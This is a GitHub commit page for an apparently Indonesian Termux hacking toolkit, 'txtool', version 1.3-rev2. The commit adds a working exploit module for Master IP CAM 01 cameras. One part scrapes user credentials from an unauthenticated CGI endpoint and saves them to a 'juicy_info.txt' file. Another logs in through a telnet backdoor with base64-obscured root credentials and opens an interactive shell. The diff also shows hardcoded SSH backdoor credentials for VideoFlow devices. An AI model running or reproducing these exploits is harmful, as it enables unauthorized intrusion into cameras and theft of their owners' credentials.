Skip to content

Commit

Permalink
v1.3-rev2
Browse files Browse the repository at this point in the history
  • Loading branch information
kuburan committed Apr 9, 2018
1 parent a6a9dbe commit 746928e
Show file tree
Hide file tree
Showing 7 changed files with 151 additions and 25 deletions.
8 changes: 4 additions & 4 deletions CHANGELOG
Original file line number Diff line number Diff line change
@@ -1,3 +1,7 @@
-- April 10, 2018 --
* v1.3-rev2
* Master IP CAM 01 Multiple Vulnerabilities

-- April 7, 2018 --
* v1.3
* add VideoFlow DVP 10 Root ssh Backdoor Access
Expand All @@ -6,25 +10,21 @@
* v1.2-rev2
* add Contec SmartHome Unauthorized User Added


-- March 19, 2018 --
* v1.2
* add compare with ndiff


-- March 14, 2018 --
* v1.1-rev2
* add vulners
* remove some unused dork, and also make some dork more sensitively.


-- Feb 27, 2018 --
* second release (v1.1)
* add Gmail directory traversal
* add D-Link DIR605L (Denial of Service)
* add Telesquare SKT LTE Router SDT-CS3B1
* remove some unused dork, and also make some dork more sensitively.


-- Feb 6, 2018 --
* first release (v1.0)
11 changes: 10 additions & 1 deletion core/sub_menu4.py
Original file line number Diff line number Diff line change
Expand Up @@ -10,8 +10,9 @@ def menu_utama():
print("\t[" + warna.hijau + "2" + warna.tutup + "]" + warna.abuabu + " Telesquare SKT LTE Router SDT-CS3B1" + warna.tutup)
print("\t[" + warna.hijau + "3" + warna.tutup + "]" + warna.abuabu + " Contec SmartHome Unauthorized Users Added" + warna.tutup)
print("\t[" + warna.hijau + "4" + warna.tutup + "]" + warna.abuabu + " VideoFlow DVP 10 Root ssh Backdoor Access" + warna.tutup)
print("\t[" + warna.hijau + "5" + warna.tutup + "]" + warna.abuabu + " Master IP CAM 01 Multiple Vulnerabilities" + warna.tutup)
print("\t[" + warna.hijau + "0" + warna.tutup + "]" + warna.abuabu + " Back To Main Menu\n" + warna.tutup)
pilih = raw_input(warna.hijau + " tXtool " + warna.tutup + warna.kuning + " ~~>> " + warna.tutup)
pilih = raw_input(warna.hijau + " tXtool " + warna.tutup + warna.kuning + " ~~>> " + warna.tutup)
eksekusi_menu(pilih)
return

Expand Down Expand Up @@ -56,6 +57,13 @@ def menu4():
pilih = raw_input(warna.hijau + " tXtool " + warna.tutup + warna.kuning + " ~~>> " + warna.tutup)
eksekusi_menu(pilih)

def menu5():
sys.path.append("/data/data/com.termux/files/usr/share/txtool/module")
import module18
module18.exploit5()
pilih = raw_input(warna.hijau + " tXtool " + warna.tutup + warna.kuning + " ~~>> " + warna.tutup)
eksekusi_menu(pilih)

def Kembali():
back.menu['menu_utama']()

Expand All @@ -65,5 +73,6 @@ def Kembali():
'2': menu2,
'3': menu3,
'4': menu4,
'5': menu5,
'0': Kembali,
}
2 changes: 1 addition & 1 deletion core/version.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
1.3
1.3-rev2
2 changes: 1 addition & 1 deletion install.py
Original file line number Diff line number Diff line change
Expand Up @@ -22,5 +22,5 @@
os.system("cp -r module %s/txtool && cp -r other %s/txtool" %
(share, share))
os.system("apt-get install --assume-yes nmap php curl")
os.system("pip2 install requests")
os.system("pip2 install requests bs4")
print "\n[*] Done !!! type command txtool to launch txtool\n"
150 changes: 133 additions & 17 deletions module/module18.py
Original file line number Diff line number Diff line change
@@ -1,8 +1,8 @@
#!/data/data/com.termux/files/usr/bin/python2
# -*- coding: utf-8 -*-

import sys, socket, os, time, base64, getpass

import sys, socket, os, time, telnetlib
from base64 import b64decode as xxxx
sys.path.append('/data/data/com.termux/files/usr/share/txtool/core')
from fungsi import warna, IP, ipv4, finish_exploit, ssh_shell, txtool_dir
import sub_menu4 as BACK
Expand Down Expand Up @@ -58,7 +58,7 @@ def exploit2():
print("\n\t[" + warna.hijau + "1" + warna.tutup + "]" + warna.abuabu + " Denial Of Service" + warna.tutup)
print("\t[" + warna.hijau + "2" + warna.tutup + "]" + warna.abuabu + " Information Disclosure" + warna.tutup)
print("\t[" + warna.hijau + "0" + warna.tutup + "]" + warna.abuabu + " Back" + warna.tutup)
choise = raw_input(warna.biru + "\n[+]" + warna.tutup + " Chose an action" + warna.kuning + " >> " + warna.tutup)
choise = raw_input(warna.biru + "\n[+]" + warna.tutup + " Select An action" + warna.kuning + " >> " + warna.tutup)
if choise == '':
empty()
BACK.menu['menu_utama']()
Expand Down Expand Up @@ -360,7 +360,7 @@ def exploit3():
BACK.menu['menu_utama']()

if not true_ip:
print(warna.merah + "\n[x] " + warna.tutup + "Wrong ip adress")
print(warna.merah + "\n[x] " + warna.tutup + "incorrect IP address")
BACK.menu['menu_utama']()

port = '9000'
Expand Down Expand Up @@ -396,25 +396,30 @@ def exploit3():

except requests.exceptions.HTTPError as error_1:
print warna.merah + "\n[x]" + warna.tutup + " Http Error : ", error_1
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except requests.exceptions.ConnectionError as error_2:
print warna.merah + "\n[x]" + warna.tutup + " Error Connecting : ", error_2
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except requests.exceptions.Timeout as error_3:
print warna.merah + "\n[x]" + warna.tutup + " Timeout Error : ", error_3
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except requests.exceptions.RequestException as err:
print warna.merah + "\n[x]" + warna.tutup, err
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

def exploit4():
try:
import paramiko
except ImportError:
print(warna.merah + "\n[x] " + warna.tutup + "Error, please install paramiko module. ($ pip2 install paramiko)\n")
sys.exit()

from paramiko.ssh_exception import BadHostKeyException, AuthenticationException, SSHException

Expand All @@ -429,8 +434,8 @@ def exploit4():
_user = ["""root""",
"""mom"""]
_connection = None
p = ["""$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./""",
"""videoflow"""]
p = ["""videoflow""",
"""$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./"""]
_passwords = [line.strip() for line in p]
_username = [line.strip() for line in _user]
_retries = range(len(_passwords and _username))
Expand All @@ -440,10 +445,10 @@ def exploit4():
BACK.menu['menu_utama']()

if not true_ip:
print(warna.merah + "\n[x] " + warna.tutup + "Wrong ip adress")
print(warna.merah + "\n[x] " + warna.tutup + "incorrect IP address")
BACK.menu['menu_utama']()

print(warna.hijau + "\n[*] " + warna.tutup + "Trying to login")
print(warna.hijau + "\n[*] " + warna.tutup + "Trying to login...")
for _pass in _passwords:
for _u in _username:
try:
Expand All @@ -470,12 +475,123 @@ def exploit4():
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

# with requests.Session() as s:
# url = ("http://%s/login.html" % (target))
# header = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36'}
# payload = {'Content-Type': 'text/html;charset=UTF-8',
# 'Action': '%s/index.html' % (target), 'Class': "Login",
# 'username': 'dancok', 'password' : 'dancok'}
# send = s.post(url, headers=header, data=payload, timeout=10)
# print send.status_code
# print send.content
def exploit5():
try:
from bs4 import BeautifulSoup

except ImportError:
print(warna.merah + "\n[x] " + warna.tutup + "Error, please install bs4 module. ($ pip2 install bs4)\n")
sys.exit()

IP()
print(warna.kuning + "\n[!]" + warna.tutup + " Vendor: Master IP CAM" + warna.tutup)
print(warna.kuning + "[!]" + warna.tutup + " Affected Version: 3.3.4.2103" + warna.tutup)
print("\n\t[" + warna.hijau + "1" + warna.tutup + "]" + warna.abuabu + " Sensitive Information Disclousure" + warna.tutup)
print("\t[" + warna.hijau + "2" + warna.tutup + "]" + warna.abuabu + " telnet Backdoor Access" + warna.tutup)
print("\t[" + warna.hijau + "0" + warna.tutup + "]" + warna.abuabu + " Back" + warna.tutup)
select = raw_input(warna.biru + "\n[+]" + warna.tutup + " Select An action" + warna.kuning + " >> " + warna.tutup)
if select == '':
empty()
BACK.menu['menu_utama']()

if select == '1':
try:
print(warna.kuning + "\n[!]" + warna.tutup + " Host or ip address" + warna.tutup)
t = raw_input(warna.biru + "[+]" + warna.tutup + " Target" + warna.kuning + " >> " + warna.tutup)
if t == '':
empty()
BACK.menu['menu_utama']()

print(warna.hijau + "\n[*] " + warna.tutup + "trying to collect sensitive information...")
time.sleep(1)
url = "http://%s/web/cgi-bin/hi3510/param.cgi?cmd=getuser" % (t)
header = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36'}
req = requests.get(url, headers=header, timeout=10)
req.raise_for_status()
soup = BeautifulSoup(req.content, "html.parser")
for script in soup(["script", "style"]):
script.decompose()
text = soup.get_text()
lines = (line.strip() for line in text.splitlines())
chunks = (phrase.strip("var" ";") for line in lines for phrase in line.split(" var "))
text = '\n'.join(chunk for chunk in chunks if chunk)
clear_text = text.encode(sys.stdout.encoding)
print(clear_text)
os.system("""mkdir -p %s/%s""" % (txtool_dir, t))
f = open(txtool_dir + "/%s/juicy_info.txt" % (t), "w")
f.write(clear_text + "\nLogin page : http://%s/web/index.html\n" % (t))
f.close()
print(warna.hijau + "[*] " + warna.tutup + "Login page : http://%s/web/index.html" % (t))
print(warna.hijau + "\n[*] " + warna.tutup + "sensitive information has been saved to ~/.txtool/%s/juicy_info.txt" % (t))
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except requests.exceptions.RequestException as er:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,er
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except requests.exceptions.HTTPError as er_1:
print warna.merah + "\n[x]" + warna.tutup + " Http Error : ", er_1
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except requests.exceptions.ConnectionError as er_2:
print warna.merah + "\n[x]" + warna.tutup + " Error Connecting : ", er_2
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except requests.exceptions.Timeout as er_3:
print warna.merah + "\n[x]" + warna.tutup + " Timeout Error : ", er_3
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

if select == '2':
print(warna.kuning + "\n[!]" + warna.tutup + " Host or ip address" + warna.tutup)
_host = raw_input(warna.biru + "[+]" + warna.tutup + " Target" + warna.kuning + " >> " + warna.tutup)
if _host == '':
empty()
BACK.menu['menu_utama']()

print(warna.hijau + "\n[*] " + warna.tutup + "Trying to login...")
time.sleep(1)
try:
_user = xxxx(b'cm9vdA==')
_password = xxxx(b'Y2F0MTAyOQ==')
tel_conn = telnetlib.Telnet(_host)
tel_conn.expect(["RT-IPC login: "], 10)
tel_conn.write(_user + "\n")
tel_conn.expect(["Password: ", "password"], 10)
tel_conn.write(_password + "\n")
(i, obj, res) = tel_conn.expect(["Incorrect", "incorrect"], 10)
if i != -1:
print(warna.merah + "\n[x]" + warna.tutup + " login failed")
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print(warna.hijau + "\n[*] " + warna.tutup + "shell has been successfully opened")
tel_conn.write("\n")
tel_conn.interact()
print(warna.merah + "\n[x]" + warna.tutup + " shell closed")
tel_conn.close()
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue")
BACK.menu['menu_utama']()

except socket.error as a:
print warna.merah + "\n[x]" + warna.tutup + "socket error : ", a
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

except socket.timeout as b:
print warna.merah + "\n[x]" + warna.tutup + "socket timeout : ", b
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()

elif select == '0':
BACK.menu['menu_utama']()

else:
print warna.merah + "\n[x] " + warna.tutup + "Wrong command."
BACK.menu['menu_utama']()
1 change: 1 addition & 0 deletions requirement.txt
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
bs4
pynacl
requests
paramiko
2 changes: 1 addition & 1 deletion txtool
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

"""
Created by : Kuburan_0day A.K.A Gembur Ae
Version : 1.3
Version : 1.3-rev2
Codename : Tali Pocong
"""
Expand Down

0 comments on commit 746928e

Please sign in to comment.